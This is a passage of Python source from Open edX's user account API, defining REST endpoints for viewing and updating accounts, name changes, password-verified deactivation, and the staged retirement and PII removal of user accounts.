return d_damper_force
| StarcoderdataPython |
182532 | """
An API for retrieving user account information.
For additional information and historical context, see:
https://openedx.atlassian.net/wiki/display/TNL/User+API
"""
import datetime
import logging
import uuid
from functools import wraps
import pytz
from rest_framework.exceptions import UnsupportedMediaType
from consent.models import DataSharingConsent
from django.apps import apps
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model, logout
from django.contrib.sites.models import Site
from django.core.cache import cache
from django.db import transaction
from django.utils.translation import ugettext as _
from edx_ace import ace
from edx_ace.recipient import Recipient
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from edx_rest_framework_extensions.auth.session.authentication import SessionAuthenticationAllowInactiveUser
from enterprise.models import EnterpriseCourseEnrollment, EnterpriseCustomerUser, PendingEnterpriseCustomerUser
from integrated_channels.degreed.models import DegreedLearnerDataTransmissionAudit
from integrated_channels.sap_success_factors.models import SapSuccessFactorsLearnerDataTransmissionAudit
from rest_framework import permissions, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.parsers import JSONParser
from rest_framework.response import Response
from rest_framework.serializers import ValidationError
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from wiki.models import ArticleRevision
from wiki.models.pluginbase import RevisionPluginRevision
from common.djangoapps.entitlements.models import CourseEntitlement
from common.djangoapps.student.models import ( # lint-amnesty, pylint: disable=unused-import
AccountRecovery,
CourseEnrollmentAllowed,
LoginFailures,
ManualEnrollmentAudit,
PendingEmailChange,
PendingNameChange,
Registration,
User,
UserProfile,
get_potentially_retired_user_by_username,
get_retired_email_by_email,
get_retired_username_by_username,
is_username_retired
)
from common.djangoapps.student.models_api import do_name_change_request
from openedx.core.djangoapps.ace_common.template_context import get_base_template_context
from openedx.core.djangoapps.api_admin.models import ApiAccessRequest
from openedx.core.djangoapps.course_groups.models import UnregisteredLearnerCohortAssignments
from openedx.core.djangoapps.credit.models import CreditRequest, CreditRequirementStatus
from openedx.core.djangoapps.external_user_ids.models import ExternalId, ExternalIdType
from openedx.core.djangoapps.lang_pref import LANGUAGE_KEY
from openedx.core.djangoapps.profile_images.images import remove_profile_images
from openedx.core.djangoapps.user_api.accounts.image_helpers import get_profile_image_names, set_has_profile_image
from openedx.core.djangoapps.user_authn.exceptions import AuthFailedError
from openedx.core.lib.api.authentication import BearerAuthenticationAllowInactiveUser
from openedx.core.lib.api.parsers import MergePatchParser
from ..errors import AccountUpdateError, AccountValidationError, UserNotAuthorized, UserNotFound
from ..message_types import DeletionNotificationMessage
from ..models import (
RetirementState,
RetirementStateError,
UserOrgTag,
UserRetirementPartnerReportingStatus,
UserRetirementStatus
)
from .api import get_account_settings, update_account_settings
from .permissions import CanDeactivateUser, CanReplaceUsername, CanRetireUser
from .serializers import (
PendingNameChangeSerializer,
UserRetirementPartnerReportSerializer,
UserRetirementStatusSerializer,
UserSearchEmailSerializer
)
from .signals import USER_RETIRE_LMS_CRITICAL, USER_RETIRE_LMS_MISC, USER_RETIRE_MAILINGS
from .utils import create_retirement_request_and_deactivate_account
try:
from coaching.api import has_ever_consented_to_coaching
except ImportError:
has_ever_consented_to_coaching = None
log = logging.getLogger(__name__)
USER_PROFILE_PII = {
'name': '',
'meta': '',
'location': '',
'year_of_birth': None,
'gender': None,
'mailing_address': None,
'city': None,
'country': None,
'bio': None,
'phone_number': None,
}
def request_requires_username(function):
"""
Requires that a ``username`` key containing a truthy value exists in
the ``request.data`` attribute of the decorated function.
"""
@wraps(function)
def wrapper(self, request): # pylint: disable=missing-docstring
username = request.data.get('username', None)
if not username:
return Response(
status=status.HTTP_404_NOT_FOUND,
data={'message': 'The user was not specified.'}
)
return function(self, request)
return wrapper
class AccountViewSet(ViewSet):
"""
**Use Cases**
Get or update a user's account information. Updates are supported
only through merge patch.
**Example Requests**
GET /api/user/v1/me[?view=shared]
GET /api/user/v1/accounts?usernames={username1,username2}[?view=shared]
GET /api/user/v1/accounts?email={user_email}
GET /api/user/v1/accounts/{username}/[?view=shared]
PATCH /api/user/v1/accounts/{username}/{"key":"value"} "application/merge-patch+json"
POST /api/user/v1/accounts/search_emails "application/json"
**Notes for PATCH requests to /accounts endpoints**
* Requested updates to social_links are automatically merged with
previously set links. That is, any newly introduced platforms are
add to the previous list. Updated links to pre-existing platforms
replace their values in the previous list. Pre-existing platforms
can be removed by setting the value of the social_link to an
empty string ("").
**Response Values for GET requests to the /me endpoint**
If the user is not logged in, an HTTP 401 "Not Authorized" response
is returned.
Otherwise, an HTTP 200 "OK" response is returned. The response
contains the following value:
* username: The username associated with the account.
**Response Values for GET requests to /accounts endpoints**
If no user exists with the specified username, or email, an HTTP 404 "Not
Found" response is returned.
If the user makes the request for her own account, or makes a
request for another account and has "is_staff" access, an HTTP 200
"OK" response is returned. The response contains the following
values.
* id: numerical lms user id in db
* activation_key: auto-genrated activation key when signed up via email
* bio: null or textual representation of user biographical
information ("about me").
* country: An ISO 3166 country code or null.
* date_joined: The date the account was created, in the string
format provided by datetime. For example, "2014-08-26T17:52:11Z".
* last_login: The latest date the user logged in, in the string datetime format.
* email: Email address for the user. New email addresses must be confirmed
via a confirmation email, so GET does not reflect the change until
the address has been confirmed.
* secondary_email: A secondary email address for the user. Unlike
the email field, GET will reflect the latest update to this field
even if changes have yet to be confirmed.
* gender: One of the following values:
* null
* "f"
* "m"
* "o"
* goals: The textual representation of the user's goals, or null.
* is_active: Boolean representation of whether a user is active.
* language: The user's preferred language, or null.
* language_proficiencies: Array of language preferences. Each
preference is a JSON object with the following keys:
* "code": string ISO 639-1 language code e.g. "en".
* level_of_education: One of the following values:
* "p": PhD or Doctorate
* "m": Master's or professional degree
* "b": Bachelor's degree
* "a": Associate's degree
* "hs": Secondary/high school
* "jhs": Junior secondary/junior high/middle school
* "el": Elementary/primary school
* "none": None
* "o": Other
* null: The user did not enter a value
* mailing_address: The textual representation of the user's mailing
address, or null.
* name: The full name of the user.
* profile_image: A JSON representation of a user's profile image
information. This representation has the following keys.
* "has_image": Boolean indicating whether the user has a profile
image.
* "image_url_*": Absolute URL to various sizes of a user's
profile image, where '*' matches a representation of the
corresponding image size, such as 'small', 'medium', 'large',
and 'full'. These are configurable via PROFILE_IMAGE_SIZES_MAP.
* requires_parental_consent: True if the user is a minor
requiring parental consent.
* social_links: Array of social links, sorted alphabetically by
"platform". Each preference is a JSON object with the following keys:
* "platform": A particular social platform, ex: 'facebook'
* "social_link": The link to the user's profile on the particular platform
* username: The username associated with the account.
* year_of_birth: The year the user was born, as an integer, or null.
* account_privacy: The user's setting for sharing her personal
profile. Possible values are "all_users", "private", or "custom".
If "custom", the user has selectively chosen a subset of shareable
fields to make visible to others via the User Preferences API.
* accomplishments_shared: Signals whether badges are enabled on the
platform and should be fetched.
* phone_number: The phone number for the user. String of numbers with
an optional `+` sign at the start.
* pending_name_change: If the user has an active name change request, returns the
requested name.
* is_verified_name_enabled: Temporary flag to control verified name field - see
https://github.com/edx/edx-name-affirmation/blob/main/edx_name_affirmation/toggles.py
For all text fields, plain text instead of HTML is supported. The
data is stored exactly as specified. Clients must HTML escape
rendered values to avoid script injections.
If a user who does not have "is_staff" access requests account
information for a different user, only a subset of these fields is
returned. The returned fields depend on the
ACCOUNT_VISIBILITY_CONFIGURATION configuration setting and the
visibility preference of the user for whom data is requested.
Note that a user can view which account fields they have shared
with other users by requesting their own username and providing
the "view=shared" URL parameter.
**Response Values for PATCH**
Users can only modify their own account information. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If no user exists with the specified username, an HTTP 404 "Not
Found" response is returned.
If "application/merge-patch+json" is not the specified content
type, a 415 "Unsupported Media Type" response is returned.
If validation errors prevent the update, this method returns a 400
"Bad Request" response that includes a "field_errors" field that
lists all error messages.
If a failure at the time of the update prevents the update, a 400
"Bad Request" error is returned. The JSON collection contains
specific errors.
If the update is successful, updated user account data is returned.
"""
authentication_classes = (
JwtAuthentication, BearerAuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser
)
permission_classes = (permissions.IsAuthenticated,)
parser_classes = (JSONParser, MergePatchParser,)
def get(self, request):
"""
GET /api/user/v1/me
"""
return Response({'username': request.user.username})
def list(self, request):
"""
GET /api/user/v1/accounts?username={username1,username2}
GET /api/user/v1/accounts?email={user_email}
"""
usernames = request.GET.get('username')
user_email = request.GET.get('email')
search_usernames = []
if usernames:
search_usernames = usernames.strip(',').split(',')
elif user_email:
user_email = user_email.strip('')
try:
user = User.objects.get(email=user_email)
except (UserNotFound, User.DoesNotExist):
return Response(status=status.HTTP_404_NOT_FOUND)
search_usernames = [user.username]
try:
account_settings = get_account_settings(
request, search_usernames, view=request.query_params.get('view'))
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(account_settings)
def search_emails(self, request):
"""
POST /api/user/v1/accounts/search_emails
Content Type: "application/json"
{
"emails": ["<EMAIL>", "<EMAIL>"]
}
Response:
[
{
"username": "edx",
"email": "<EMAIL>",
"id": 3,
},
{
"username": "staff",
"email": "<EMAIL>",
"id": 8,
}
]
"""
if not request.user.is_staff:
return Response(
{
'developer_message': 'not_found',
'user_message': 'Not Found'
},
status=status.HTTP_404_NOT_FOUND
)
try:
user_emails = request.data['emails']
except KeyError as error:
error_message = f'{error} field is required'
return Response(
{
'developer_message': error_message,
'user_message': error_message
},
status=status.HTTP_400_BAD_REQUEST
)
users = User.objects.filter(email__in=user_emails)
data = UserSearchEmailSerializer(users, many=True).data
return Response(data)
def retrieve(self, request, username):
"""
GET /api/user/v1/accounts/{username}/
"""
try:
account_settings = get_account_settings(
request, [username], view=request.query_params.get('view'))
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(account_settings[0])
def partial_update(self, request, username):
"""
PATCH /api/user/v1/accounts/{username}/
Note that this implementation is the "merge patch" implementation proposed in
https://tools.ietf.org/html/rfc7396. The content_type must be "application/merge-patch+json" or
else an error response with status code 415 will be returned.
"""
if request.content_type != MergePatchParser.media_type:
raise UnsupportedMediaType(request.content_type)
try:
with transaction.atomic():
update_account_settings(request.user, request.data, username=username)
account_settings = get_account_settings(request, [username])[0]
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except AccountValidationError as err:
return Response({"field_errors": err.field_errors}, status=status.HTTP_400_BAD_REQUEST)
except AccountUpdateError as err:
return Response(
{
"developer_message": err.developer_message,
"user_message": err.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
return Response(account_settings)
class NameChangeView(APIView):
"""
Request a profile name change. This creates a PendingNameChange to be verified later,
rather than updating the user's profile name directly.
"""
authentication_classes = (JwtAuthentication, SessionAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def post(self, request):
"""
POST /api/user/v1/accounts/name_change/
Example request:
{
"name": "<NAME>"
}
"""
user = request.user
new_name = request.data.get('name', None)
rationale = f'Name change requested through account API by {user.username}'
serializer = PendingNameChangeSerializer(data={'new_name': new_name})
if serializer.is_valid():
pending_name_change = do_name_change_request(user, new_name, rationale)[0]
if pending_name_change:
return Response(status=status.HTTP_201_CREATED)
else:
return Response(
'The name given was identical to the current name.',
status=status.HTTP_400_BAD_REQUEST
)
return Response(status=status.HTTP_400_BAD_REQUEST, data=serializer.errors)
class AccountDeactivationView(APIView):
"""
Account deactivation viewset. Currently only supports POST requests.
Only admins can deactivate accounts.
"""
authentication_classes = (JwtAuthentication, )
permission_classes = (permissions.IsAuthenticated, CanDeactivateUser)
def post(self, request, username):
"""
POST /api/user/v1/accounts/{username}/deactivate/
Marks the user as having no password set for deactivation purposes.
"""
_set_unusable_password(User.objects.get(username=username))
return Response(get_account_settings(request, [username])[0])
class DeactivateLogoutView(APIView):
"""
POST /api/user/v1/accounts/deactivate_logout/
{
"password": "<PASSWORD>",
}
**POST Parameters**
A POST request must include the following parameter.
* password: Required. The current password of the user being deactivated.
**POST Response Values**
If the request does not specify a username or submits a username
for a non-existent user, the request returns an HTTP 404 "Not Found"
response.
If a user who is not a superuser tries to deactivate a user,
the request returns an HTTP 403 "Forbidden" response.
If the specified user is successfully deactivated, the request
returns an HTTP 204 "No Content" response.
If an unanticipated error occurs, the request returns an
HTTP 500 "Internal Server Error" response.
Allows an LMS user to take the following actions:
- Change the user's password permanently to Django's unusable password
- Log the user out
- Create a row in the retirement table for that user
"""
authentication_classes = (JwtAuthentication, SessionAuthentication, )
permission_classes = (permissions.IsAuthenticated, )
def post(self, request):
"""
POST /api/user/v1/accounts/deactivate_logout/
Marks the user as having no password set for deactivation purposes,
and logs the user out.
"""
user_model = get_user_model()
try:
# Get the username from the request and check that it exists
verify_user_password_response = self._verify_user_password(request)
if verify_user_password_response.status_code != status.HTTP_204_NO_CONTENT:
return verify_user_password_response
with transaction.atomic():
user_email = request.user.email
create_retirement_request_and_deactivate_account(request.user)
try:
# Send notification email to user
site = Site.objects.get_current()
notification_context = get_base_template_context(site)
notification_context.update({'full_name': request.user.profile.name})
language_code = request.user.preferences.model.get_value(
request.user,
LANGUAGE_KEY,
default=settings.LANGUAGE_CODE
)
notification = DeletionNotificationMessage().personalize(
recipient=Recipient(lms_user_id=0, email_address=user_email),
language=language_code,
user_context=notification_context,
)
ace.send(notification)
except Exception as exc:
log.exception('Error sending out deletion notification email')
raise
# Log the user out.
logout(request)
return Response(status=status.HTTP_204_NO_CONTENT)
except KeyError:
log.exception(f'Username not specified {request.user}')
return Response('Username not specified.', status=status.HTTP_404_NOT_FOUND)
except user_model.DoesNotExist:
log.exception(f'The user "{request.user.username}" does not exist.')
return Response(
f'The user "{request.user.username}" does not exist.', status=status.HTTP_404_NOT_FOUND
)
except Exception as exc: # pylint: disable=broad-except
log.exception(f'500 error deactivating account {exc}')
return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def _verify_user_password(self, request):
"""
If the user is logged in and we want to verify that they have submitted the correct password
for a major account change (for example, retiring this user's account).
Args:
request (HttpRequest): A request object where the password should be included in the POST fields.
"""
try:
self._check_excessive_login_attempts(request.user)
user = authenticate(username=request.user.username, password=request.POST['password'], request=request)
if user:
if LoginFailures.is_feature_enabled():
LoginFailures.clear_lockout_counter(user)
return Response(status=status.HTTP_204_NO_CONTENT)
else:
self._handle_failed_authentication(request.user)
except AuthFailedError as err:
log.exception(
f"The user password to deactivate was incorrect. {request.user.username}"
)
return Response(str(err), status=status.HTTP_403_FORBIDDEN)
except Exception as err: # pylint: disable=broad-except
return Response(f"Could not verify user password: {err}", status=status.HTTP_400_BAD_REQUEST)
def _check_excessive_login_attempts(self, user):
"""
See if account has been locked out due to excessive login failures
"""
if user and LoginFailures.is_feature_enabled():
if LoginFailures.is_user_locked_out(user):
raise AuthFailedError(_('This account has been temporarily locked due '
'to excessive login failures. Try again later.'))
def _handle_failed_authentication(self, user):
"""
Handles updating the failed login count, inactive user notifications, and logging failed authentications.
"""
if user and LoginFailures.is_feature_enabled():
LoginFailures.increment_lockout_counter(user)
raise AuthFailedError(_('Email or password is incorrect.'))
def _set_unusable_password(user):
"""
Helper method for the shared functionality of setting a user's
password to the unusable password, thus deactivating the account.
"""
user.set_unusable_password()
user.save()
class AccountRetirementPartnerReportView(ViewSet):
"""
Provides API endpoints for managing partner reporting of retired
users.
"""
DELETION_COMPLETED_KEY = 'deletion_completed'
ORGS_CONFIG_KEY = 'orgs_config'
ORGS_CONFIG_ORG_KEY = 'org'
ORGS_CONFIG_FIELD_HEADINGS_KEY = 'field_headings'
ORIGINAL_EMAIL_KEY = 'original_email'
ORIGINAL_NAME_KEY = 'original_name'
STUDENT_ID_KEY = 'student_id'
authentication_classes = (JwtAuthentication,)
permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
parser_classes = (JSONParser,)
serializer_class = UserRetirementStatusSerializer
@staticmethod
def _get_orgs_for_user(user):
"""
Returns a set of orgs that the user has enrollments with
"""
orgs = set()
for enrollment in user.courseenrollment_set.all():
org = enrollment.course_id.org
# Org can conceivably be blank or this bogus default value
if org and org != 'outdated_entry':
orgs.add(org)
try:
# if the user has ever launched a managed Zoom xblock,
# we'll notify Zoom to delete their records.
if user.launchlog_set.filter(managed=True).count():
orgs.add('zoom')
except AttributeError:
# Zoom XBlock not installed
pass
return orgs
def retirement_partner_report(self, request): # pylint: disable=unused-argument
"""
POST /api/user/v1/accounts/retirement_partner_report/
Returns the list of UserRetirementPartnerReportingStatus users
that are not already being processed and updates their status
to indicate they are currently being processed.
"""
retirement_statuses = UserRetirementPartnerReportingStatus.objects.filter(
is_being_processed=False
).order_by('id')
retirements = []
for retirement_status in retirement_statuses:
retirements.append(self._get_retirement_for_partner_report(retirement_status))
serializer = UserRetirementPartnerReportSerializer(retirements, many=True)
retirement_statuses.update(is_being_processed=True)
return Response(serializer.data)
def _get_retirement_for_partner_report(self, retirement_status):
"""
Get the retirement for this retirement_status. The retirement info will be included in the partner report.
"""
retirement = {
'user_id': retirement_status.user.pk,
'original_username': retirement_status.original_username,
AccountRetirementPartnerReportView.ORIGINAL_EMAIL_KEY: retirement_status.original_email,
AccountRetirementPartnerReportView.ORIGINAL_NAME_KEY: retirement_status.original_name,
'orgs': self._get_orgs_for_user(retirement_status.user),
'created': retirement_status.created,
}
# Some orgs have a custom list of headings and content for the partner report. Add this, if applicable.
self._add_orgs_config_for_user(retirement, retirement_status.user)
return retirement
def _add_orgs_config_for_user(self, retirement, user):
"""
Check to see if the user's info was sent to any partners (orgs) that have a a custom list of headings and
content for the partner report. If so, add this.
"""
# See if the MicroBachelors coaching provider needs to be notified of this user's retirement
if has_ever_consented_to_coaching is not None and has_ever_consented_to_coaching(user):
# See if the user has a MicroBachelors external id. If not, they were never sent to the
# coaching provider.
external_ids = ExternalId.objects.filter(
user=user,
external_id_type__name=ExternalIdType.MICROBACHELORS_COACHING
)
if external_ids.exists():
# User has an external id. Add the additional info.
external_id = str(external_ids[0].external_user_id)
self._add_coaching_orgs_config(retirement, external_id)
def _add_coaching_orgs_config(self, retirement, external_id):
"""
Add the orgs configuration for MicroBachelors coaching
"""
# Add the custom field headings
retirement[AccountRetirementPartnerReportView.ORGS_CONFIG_KEY] = [
{
AccountRetirementPartnerReportView.ORGS_CONFIG_ORG_KEY: 'mb_coaching',
AccountRetirementPartnerReportView.ORGS_CONFIG_FIELD_HEADINGS_KEY: [
AccountRetirementPartnerReportView.STUDENT_ID_KEY,
AccountRetirementPartnerReportView.ORIGINAL_EMAIL_KEY,
AccountRetirementPartnerReportView.ORIGINAL_NAME_KEY,
AccountRetirementPartnerReportView.DELETION_COMPLETED_KEY
]
}
]
# Add the custom field value
retirement[AccountRetirementPartnerReportView.STUDENT_ID_KEY] = external_id
@request_requires_username
def retirement_partner_status_create(self, request):
"""
PUT /api/user/v1/accounts/retirement_partner_report/
```
{
'username': 'user_to_retire'
}
```
Creates a UserRetirementPartnerReportingStatus object for the given user
as part of the retirement pipeline.
"""
username = request.data['username']
try:
retirement = UserRetirementStatus.get_retirement_for_retirement_action(username)
orgs = self._get_orgs_for_user(retirement.user)
if orgs:
UserRetirementPartnerReportingStatus.objects.get_or_create(
user=retirement.user,
defaults={
'original_username': retirement.original_username,
'original_email': retirement.original_email,
'original_name': retirement.original_name
}
)
return Response(status=status.HTTP_204_NO_CONTENT)
except UserRetirementStatus.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
def retirement_partner_cleanup(self, request):
"""
POST /api/user/v1/accounts/retirement_partner_report_cleanup/
[{'original_username': 'user1'}, {'original_username': 'user2'}, ...]
Deletes UserRetirementPartnerReportingStatus objects for a list of users
that have been reported on.
"""
usernames = [u['original_username'] for u in request.data]
if not usernames:
return Response('No original_usernames given.', status=status.HTTP_400_BAD_REQUEST)
retirement_statuses = UserRetirementPartnerReportingStatus.objects.filter(
is_being_processed=True,
original_username__in=usernames
)
# Need to de-dupe usernames that differ only by case to find the exact right match
retirement_statuses_clean = [rs for rs in retirement_statuses if rs.original_username in usernames]
# During a narrow window learners were able to re-use a username that had been retired if
# they altered the capitalization of one or more characters. Therefore we can have more
# than one row returned here (due to our MySQL collation being case-insensitive), and need
# to disambiguate them in Python, which will respect case in the comparison.
if len(usernames) != len(retirement_statuses_clean):
return Response(
'{} original_usernames given, {} found!\n'
'Given usernames:\n{}\n'
'Found UserRetirementReportingStatuses:\n{}'.format(
len(usernames),
len(retirement_statuses_clean),
usernames,
', '.join([rs.original_username for rs in retirement_statuses_clean])
),
status=status.HTTP_400_BAD_REQUEST
)
retirement_statuses.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class AccountRetirementStatusView(ViewSet):
"""
Provides API endpoints for managing the user retirement process.
"""
authentication_classes = (JwtAuthentication,)
permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
parser_classes = (JSONParser,)
serializer_class = UserRetirementStatusSerializer
def retirement_queue(self, request):
"""
GET /api/user/v1/accounts/retirement_queue/
{'cool_off_days': 7, 'states': ['PENDING', 'COMPLETE']}
Returns the list of RetirementStatus users in the given states that were
created in the retirement queue at least `cool_off_days` ago.
"""
try:
cool_off_days = int(request.GET['cool_off_days'])
if cool_off_days < 0:
raise RetirementStateError('Invalid argument for cool_off_days, must be greater than 0.')
states = request.GET.getlist('states')
if not states:
raise RetirementStateError('Param "states" required with at least one state.')
state_objs = RetirementState.objects.filter(state_name__in=states)
if state_objs.count() != len(states):
found = [s.state_name for s in state_objs]
raise RetirementStateError(f'Unknown state. Requested: {states} Found: {found}')
earliest_datetime = datetime.datetime.now(pytz.UTC) - datetime.timedelta(days=cool_off_days)
retirements = UserRetirementStatus.objects.select_related(
'user', 'current_state', 'last_state'
).filter(
current_state__in=state_objs, created__lt=earliest_datetime
).order_by(
'id'
)
serializer = UserRetirementStatusSerializer(retirements, many=True)
return Response(serializer.data)
# This should only occur on the int() conversion of cool_off_days at this point
except ValueError:
return Response('Invalid cool_off_days, should be integer.', status=status.HTTP_400_BAD_REQUEST)
except KeyError as exc:
return Response(f'Missing required parameter: {str(exc)}',
status=status.HTTP_400_BAD_REQUEST)
except RetirementStateError as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
def retirements_by_status_and_date(self, request):
"""
GET /api/user/v1/accounts/retirements_by_status_and_date/
?start_date=2018-09-05&end_date=2018-09-07&state=COMPLETE
Returns a list of UserRetirementStatusSerializer serialized
RetirementStatus rows in the given state that were created in the
retirement queue between the dates given. Date range is inclusive,
so to get one day you would set both dates to that day.
"""
try:
start_date = datetime.datetime.strptime(request.GET['start_date'], '%Y-%m-%d').replace(tzinfo=pytz.UTC)
end_date = datetime.datetime.strptime(request.GET['end_date'], '%Y-%m-%d').replace(tzinfo=pytz.UTC)
now = datetime.datetime.now(pytz.UTC)
if start_date > now or end_date > now or start_date > end_date:
raise RetirementStateError('Dates must be today or earlier, and start must be earlier than end.')
# Add a day to make sure we get all the way to 23:59:59.999, this is compared "lt" in the query
# not "lte".
end_date += datetime.timedelta(days=1)
state = request.GET['state']
state_obj = RetirementState.objects.get(state_name=state)
retirements = UserRetirementStatus.objects.select_related(
'user', 'current_state', 'last_state'
).filter(
current_state=state_obj, created__lt=end_date, created__gte=start_date
).order_by(
'id'
)
serializer = UserRetirementStatusSerializer(retirements, many=True)
return Response(serializer.data)
# This should only occur on the datetime conversion of the start / end dates.
except ValueError as exc:
return Response(f'Invalid start or end date: {str(exc)}', status=status.HTTP_400_BAD_REQUEST)
except KeyError as exc:
return Response(f'Missing required parameter: {str(exc)}',
status=status.HTTP_400_BAD_REQUEST)
except RetirementState.DoesNotExist:
return Response('Unknown retirement state.', status=status.HTTP_400_BAD_REQUEST)
except RetirementStateError as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
def retrieve(self, request, username): # pylint: disable=unused-argument
"""
GET /api/user/v1/accounts/{username}/retirement_status/
Returns the RetirementStatus of a given user, or 404 if that row
doesn't exist.
"""
try:
user = get_potentially_retired_user_by_username(username)
retirement = UserRetirementStatus.objects.select_related(
'user', 'current_state', 'last_state'
).get(user=user)
serializer = UserRetirementStatusSerializer(instance=retirement)
return Response(serializer.data)
except (UserRetirementStatus.DoesNotExist, User.DoesNotExist):
return Response(status=status.HTTP_404_NOT_FOUND)
@request_requires_username
def partial_update(self, request):
"""
PATCH /api/user/v1/accounts/update_retirement_status/
```
{
'username': 'user_to_retire',
'new_state': 'LOCKING_COMPLETE',
'response': 'User account locked and logged out.'
}
```
Updates the RetirementStatus row for the given user to the new
status, and append any messages to the message log.
Note that this implementation DOES NOT use the "merge patch"
implementation seen in AccountViewSet. Slumber, the project
we use to power edx-rest-api-client, does not currently support
it. The content type for this request is 'application/json'.
"""
try:
username = request.data['username']
retirements = UserRetirementStatus.objects.filter(original_username=username)
# During a narrow window learners were able to re-use a username that had been retired if
# they altered the capitalization of one or more characters. Therefore we can have more
# than one row returned here (due to our MySQL collation being case-insensitive), and need
# to disambiguate them in Python, which will respect case in the comparison.
retirement = None
if len(retirements) < 1: # lint-amnesty, pylint: disable=no-else-raise
raise UserRetirementStatus.DoesNotExist()
elif len(retirements) >= 1:
for r in retirements:
if r.original_username == username:
retirement = r
break
# UserRetirementStatus was found, but it was the wrong case.
if retirement is None:
raise UserRetirementStatus.DoesNotExist()
retirement.update_state(request.data)
return Response(status=status.HTTP_204_NO_CONTENT)
except UserRetirementStatus.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
except RetirementStateError as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
except Exception as exc: # pylint: disable=broad-except
return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def cleanup(self, request):
"""
POST /api/user/v1/accounts/retirement_cleanup/
```
{
'usernames': ['user1', 'user2', ...]
}
```
Deletes a batch of retirement requests by username.
"""
try:
usernames = request.data['usernames']
if not isinstance(usernames, list):
raise TypeError('Usernames should be an array.')
complete_state = RetirementState.objects.get(state_name='COMPLETE')
retirements = UserRetirementStatus.objects.filter(
original_username__in=usernames,
current_state=complete_state
)
# Sanity check that they're all valid usernames in the right state
if len(usernames) != len(retirements):
raise UserRetirementStatus.DoesNotExist('Not all usernames exist in the COMPLETE state.')
retirements.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
except (RetirementStateError, UserRetirementStatus.DoesNotExist, TypeError) as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
except Exception as exc: # pylint: disable=broad-except
return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class LMSAccountRetirementView(ViewSet):
"""
Provides an API endpoint for retiring a user in the LMS.
"""
authentication_classes = (JwtAuthentication,)
permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
parser_classes = (JSONParser,)
@request_requires_username
def post(self, request):
"""
POST /api/user/v1/accounts/retire_misc/
```
{
'username': 'user_to_retire'
}
```
Retires the user with the given username in the LMS.
"""
username = request.data['username']
try:
retirement = UserRetirementStatus.get_retirement_for_retirement_action(username)
RevisionPluginRevision.retire_user(retirement.user)
ArticleRevision.retire_user(retirement.user)
PendingNameChange.delete_by_user_value(retirement.user, field='user')
ManualEnrollmentAudit.retire_manual_enrollments(retirement.user, retirement.retired_email)
CreditRequest.retire_user(retirement)
ApiAccessRequest.retire_user(retirement.user)
CreditRequirementStatus.retire_user(retirement)
# This signal allows code in higher points of LMS to retire the user as necessary
USER_RETIRE_LMS_MISC.send(sender=self.__class__, user=retirement.user)
# This signal allows code in higher points of LMS to unsubscribe the user
# from various types of mailings.
USER_RETIRE_MAILINGS.send(
sender=self.__class__,
email=retirement.original_email,
new_email=retirement.retired_email,
user=retirement.user
)
except UserRetirementStatus.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
except RetirementStateError as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
except Exception as exc: # pylint: disable=broad-except
return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(status=status.HTTP_204_NO_CONTENT)
class AccountRetirementView(ViewSet):
"""
Provides API endpoint for retiring a user.
"""
authentication_classes = (JwtAuthentication,)
permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
parser_classes = (JSONParser,)
@request_requires_username
def post(self, request):
"""
POST /api/user/v1/accounts/retire/
```
{
'username': 'user_to_retire'
}
```
Retires the user with the given username. This includes
retiring this username, the associated email address, and
any other PII associated with this user.
"""
username = request.data['username']
try:
retirement_status = UserRetirementStatus.get_retirement_for_retirement_action(username)
user = retirement_status.user
retired_username = retirement_status.retired_username or get_retired_username_by_username(username)
retired_email = retirement_status.retired_email or get_retired_email_by_email(user.email)
original_email = retirement_status.original_email
# Retire core user/profile information
self.clear_pii_from_userprofile(user)
self.delete_users_profile_images(user)
self.delete_users_country_cache(user)
# Retire data from Enterprise models
self.retire_users_data_sharing_consent(username, retired_username)
self.retire_sapsf_data_transmission(user)
self.retire_degreed_data_transmission(user)
self.retire_user_from_pending_enterprise_customer_user(user, retired_email)
self.retire_entitlement_support_detail(user)
# Retire misc. models that may contain PII of this user
PendingEmailChange.delete_by_user_value(user, field='user')
UserOrgTag.delete_by_user_value(user, field='user')
# Retire any objects linked to the user via their original email
CourseEnrollmentAllowed.delete_by_user_value(original_email, field='email')
UnregisteredLearnerCohortAssignments.delete_by_user_value(original_email, field='email')
# This signal allows code in higher points of LMS to retire the user as necessary
USER_RETIRE_LMS_CRITICAL.send(sender=self.__class__, user=user)
user.first_name = ''
user.last_name = ''
user.is_active = False
user.username = retired_username
user.save()
except UserRetirementStatus.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
except RetirementStateError as exc:
return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
except Exception as exc: # pylint: disable=broad-except
